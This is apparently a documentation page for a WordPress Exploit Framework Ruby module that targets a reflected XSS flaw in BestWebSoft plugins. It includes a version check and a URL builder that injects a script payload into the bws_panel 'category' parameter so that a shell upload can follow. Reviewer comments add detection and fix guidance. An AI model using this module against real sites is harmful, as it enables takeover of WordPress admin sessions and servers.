class Wpxf::Exploit::BwsPanelReflectedXssShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 6
# Sets up the module and registers its descriptive metadata.
#
# Runs the superclass initializer first, then passes the module's name,
# credits, advisory references and disclosure date to +update_info+.
# The WPVDB entry and the DefenseCode advisory listed under +references+
# are the identifiers a defender can use to look up affected plugin
# versions; this method itself performs no network activity.
def initialize
  super

  module_details = {
    name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload',
    author: [
      'DefenseCode', # Discovery
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8796'],
      ['URL', 'http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf']
    ],
    date: 'Apr 12 2017'
  }

  # Splatting keeps the call equivalent to passing the pairs inline.
  update_info(**module_details)
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 23
# Reports whether the target appears to run an affected plugin version.
#
# @return [Symbol] +:unknown+ when no plugin name is configured,
#   +:vulnerable+ when no fixed version is configured, otherwise whatever
#   +check_plugin_version_from_readme+ returns for the plugin name and
#   fixed version.
#
# NOTE(review): the +:vulnerable+ result in the nil-fixed-version branch is
# an assumption, not the outcome of a version comparison; anyone triaging
# scan output should treat it as unverified until the installed version has
# been checked against the advisory.
def check
  if plugin_name.nil?
    :unknown
  elsif fixed_version.nil?
    :vulnerable
  else
    check_plugin_version_from_readme(plugin_name, fixed_version)
  end
end
fixed_version()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 34
# Version of the plugin in which the issue was fixed.
#
# This implementation always returns +nil+, which makes +check+ report
# +:vulnerable+ without comparing versions.
# NOTE(review): presumably plugin-specific subclasses override this with a
# real version string -- confirm against the modules that inherit from here.
#
# @return [nil]
def fixed_version
  nil
end
plugin_name()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 30
# Name (slug) of the plugin this module targets.
#
# This implementation always returns +nil+, which makes +check+ report
# +:unknown+.
# NOTE(review): presumably plugin-specific subclasses override this with the
# plugin's name -- confirm against the modules that inherit from here.
#
# @return [nil]
def plugin_name
  nil
end
url_with_xss()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 42
# Builds the URL that carries the reflected script payload.
#
# The payload is placed in the +category+ query parameter of the
# +bws_panel+ admin page, so that parameter is the reflected sink this
# module relies on. For detection, the distinguishing request is one to
# admin.php with +page=bws_panel+ and a +category+ value that contains
# percent-encoded markup; the plugin-side fix is to output-encode that
# parameter (see the advisory referenced in +initialize+).
#
# @return [String] the admin URL with the encoded payload in +category+
def url_with_xss
  # Evaluate the base URL before the payload, matching the order in which
  # the two helpers are interpolated.
  base = vulnerable_url
  script = xss_url_and_ascii_encoded_include_script

  "#{base}?page=bws_panel&category=%22%3E%3Cscript%3E#{script}%3C%2Fscript%3E%3C%22"
end
vulnerable_url()
# File lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb, line 38
# Location of the admin page that reflects the parameter.
#
# Joins the WordPress admin base URL with +admin.php+ via +normalize_uri+.
# Because the page lives under the admin area, the reflected request only
# has an effect in the browser of a user who can reach that page.
# NOTE(review): the required privilege level is not visible here -- confirm
# against the advisory.
#
# @return [String] whatever +normalize_uri+ returns for the two segments
def vulnerable_url
  admin_root = wordpress_url_admin
  normalize_uri(admin_root, 'admin.php')
end